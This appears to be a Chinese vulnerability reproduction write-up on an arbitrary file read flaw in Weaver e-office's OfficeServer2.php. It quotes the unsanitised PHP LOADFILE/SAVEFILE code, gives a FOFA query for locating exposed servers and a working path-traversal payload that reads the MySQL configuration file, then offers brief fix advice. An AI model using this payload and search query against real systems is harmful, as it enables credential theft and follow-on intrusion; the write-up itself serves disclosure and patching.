泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现

本文涉及的产品
性能测试 PTS,5000VUM额度
注册配置 MSE Nacos/ZooKeeper,118元/月
应用实时监控服务-可观测链路OpenTelemetry版,每月50GB免费额度
简介: 泛微e-office OfficeServer2.php 存在任意文件读取漏洞,攻击者可通过构造特定Payload获取敏感数据信息。

声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、漏洞描述

泛微e-office OfficeServer2.php存在任意文件读取漏洞隐患,攻击者可通过此漏洞获取敏感信息,为下一步攻击做准备。

image.png

二、漏洞分析

打开iWeboffice/OfficeServer2.php,代码如下:


//取得操作命令信息

$mOption=$OPTION;                                                 //取得操作命令信息

switch ($mOption){

 case "LOADFILE":

   $mFileName = $_REQUEST["FILENAME"];

   $mRecordID = $_REQUEST['RECORDID'];

   $mFullPath = $mFilePath."/".$mRecordID."/".$mFileName;

   $mFullPath = iconv("utf-8","gbk",$mFullPath);

   $result    = file_exists($mFullPath);

   if($result == false) {

     $MsgError=$_lang["file_file_not_exist"].$mFullPath;                                 //设置错误信息

   } else {

     $fd = fopen($mFullPath, "rb");

     $mFileSize = filesize($mFullPath);

     $mFileBody = fread($fd, filesize($mFullPath));

     fclose( $fd );

     $MsgObj=$MsgObj."STATUS=".base64_encode($_lang["file_open_success"]."!")."\r\n";       //设置状态信息

   }

   break;

 case "SAVEFILE":                                             //下面的代码为保存文件在服务

   $mFileName = $_REQUEST["FILENAME"];

   $mRecordID = $_REQUEST['RECORDID'];

   $mFullPath = $mFilePath."/".$mRecordID."/".$mFileName;

   if (is_uploaded_file($_FILES['MsgFileBody']['tmp_name']))

   {                                                             //保存文档内容

     if (move_uploaded_file($_FILES['MsgFileBody']['tmp_name'], iconv("utf-8","gbk",$mFullPath)))

     {                                                //把文档保存到$mFullPath目录下面

       $mFileSize = $_FILES['MsgFileBody']['size'];   //取得文档大小

       $result    = true;

     }

     else

     {

       $MsgError=$_lang["file_save_fail"];                 //设置错误信息

       $result=false;

     }

   }

   else

   {

     $MsgError=$_lang["file_upload_fail"];                 //设置错误信息

     $result=false;

   }

   if($result)

   {

     $MsgObj=$MsgObj."STATUS=".base64_encode($_lang["file_save_success"]."!")."\r\n";   //设置状态信息

   }

   break;


在审计过程中看到LOADFILE。通过$mFileName = $_REQUEST[“FILENAME”];

获取文件名字。而下面的流程没有进行过滤就造成了任意文件读取。

image.png


三、漏洞复现

FOFA: app="泛微-EOffice"

构造POC读取配置文件(V9,V10)


Payload:iweboffice/officeserver2.php?OPTION=LOADFILE&FILENAME=../../bin/mysql_config.ini

image.png

四、修复建议


1、对用户输入进行严格的过滤和校验,避免出现任意文件读取漏洞

2、升级到安全版本

目录
相关文章
|
PHP
PHP 下载文件读取文件并下载
PHP 下载文件读取文件并下载
98 0
|
网络协议 NoSQL 应用服务中间件
php OSS 文件读取和写入文件,workerman 生成临时文件并输出浏览器下载
php OSS 文件读取和写入文件,workerman 生成临时文件并输出浏览器下载
549 0
|
机器学习/深度学习 Linux PHP
PHP.ini文件读取不到
Configuration File (php.ini) Path /usr/local/php/lib Loaded Configuration File (none) Linux 把 dtruss 改成strace 就可以 我的是mac的系统 jackluo@JackLu...
829 0
|
3月前
|
安全 关系型数据库 MySQL
PHP与MySQL交互:从入门到实践
【9月更文挑战第20天】在数字时代的浪潮中,掌握PHP与MySQL的互动成为了开发动态网站和应用程序的关键。本文将通过简明的语言和实例,引导你理解PHP如何与MySQL数据库进行对话,开启你的编程之旅。我们将从连接数据库开始,逐步深入到执行查询、处理结果,以及应对常见的挑战。无论你是初学者还是希望提升技能的开发者,这篇文章都将为你提供实用的知识和技巧。让我们一起探索PHP与MySQL交互的世界,解锁数据的力量!
|
3月前
|
NoSQL 关系型数据库 MySQL
不是 PHP 不行了,而是 MySQL 数据库扛不住啊
【9月更文挑战第8天】这段内容讨论了MySQL在某些场景下面临的挑战及其原因,并指出这些问题不能完全归咎于MySQL本身。高并发读写压力、数据量增长以及复杂查询和事务处理都可能导致性能瓶颈。然而,应用程序设计不合理、系统架构不佳以及其他数据库选择和优化策略不足也是重要因素。综合考虑这些方面才能有效解决性能问题,而MySQL通过不断改进和优化,仍然是许多应用场景中的可靠选择。
152 9
|
4月前
|
存储 SQL 关系型数据库
PHP与MySQL交互的奥秘
【8月更文挑战第29天】在编程的世界里,PHP和MySQL就像是一对默契的舞伴,共同演绎着数据的交响曲。本文将带你探索它们之间的互动,从连接数据库到执行查询,再到处理结果,每一步都充满了节奏与和谐。我们将一起走进这段代码的旅程,感受数据流动的魅力。
|
14天前
|
关系型数据库 MySQL PHP
PHP与MySQL动态网站开发实践指南####
深入探索PHP与MySQL结合的魅力,本文旨在通过一系列实战案例,揭示如何高效构建动态交互式网站。从环境搭建到代码实现,全方位解析两者协同工作的原理与技巧,为开发者提供一条清晰的学习路径。 ####
|
18天前
|
SQL 关系型数据库 MySQL
12 PHP配置数据库MySQL
路老师分享了PHP操作MySQL数据库的方法,包括安装并连接MySQL服务器、选择数据库、执行SQL语句(如插入、更新、删除和查询),以及将结果集返回到数组。通过具体示例代码,详细介绍了每一步的操作流程,帮助读者快速入门PHP与MySQL的交互。
33 1
|
24天前
|
存储 关系型数据库 MySQL
PHP与MySQL动态网站开发深度解析####
本文作为技术性文章,深入探讨了PHP与MySQL结合在动态网站开发中的应用实践,从环境搭建到具体案例实现,旨在为开发者提供一套详尽的实战指南。不同于常规摘要仅概述内容,本文将以“手把手”的教学方式,引导读者逐步构建一个功能完备的动态网站,涵盖前端用户界面设计、后端逻辑处理及数据库高效管理等关键环节,确保读者能够全面掌握PHP与MySQL在动态网站开发中的精髓。 ####
|
25天前
|
关系型数据库 MySQL PHP
PHP与MySQL动态网站开发实战指南####
本文深入探讨了PHP与MySQL在动态网站开发中的应用实践,通过具体案例解析如何高效结合这两大技术构建数据驱动的Web应用。文章将涵盖环境搭建、基础语法回顾、数据库设计与操作、用户注册与登录系统实现等关键步骤,旨在为开发者提供一个从零到一的项目实战路径,展示PHP与MySQL协同工作的强大能力。 ####